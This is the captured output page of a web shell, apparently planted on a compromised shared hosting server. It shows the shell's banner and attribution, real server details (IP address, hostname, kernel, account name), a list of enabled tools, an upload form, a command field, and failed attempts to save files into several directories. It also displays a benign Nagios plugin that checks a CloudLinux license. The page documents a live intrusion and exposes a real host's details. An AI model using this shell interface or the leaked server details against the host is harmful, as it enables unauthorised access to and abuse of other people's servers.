Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.149.239.70
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /lib64/nagios/plugins/nccustom/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib64/nagios/plugins/nccustom/check_cl_license
#!/usr/libexec/platform-python
# version 0.1, 2013/10/16
# writen by Eduard N.
# Modify by Ihor Bilyi, Phantom team, 07/2022

import os
import re
from subprocess import Popen, PIPE

# State Nagios
STATE_OK = 0
STATE_WARNING = 1
STATE_CRITICAL = 2
STATE_UNKNOWN = 3

cldetect = '/usr/bin/cldetect'

ok_pattern = re.compile(r"^OK$")
invalid_pattern = re.compile(r"^No valid license found$")

if os.path.isfile(cldetect):
    result, err = Popen([cldetect, '--check-license'], stdout=PIPE).communicate()
    result = result.decode('utf-8')
    if ok_pattern.search(result):
        print("CL license OK")
        exit(STATE_OK)
    elif invalid_pattern.search(result):
        print("Critical. No CL license found")
        exit(STATE_CRITICAL)
    else:
        print(result)
        print(err.decode('utf-8'))
        exit(STATE_UNKNOWN)
else:
    print("OK. Binary file cldetect not found -> no CL on host, CL license not needed")
    exit(STATE_OK)

Youez - 2016 - github.com/yon3zu
LinuXploit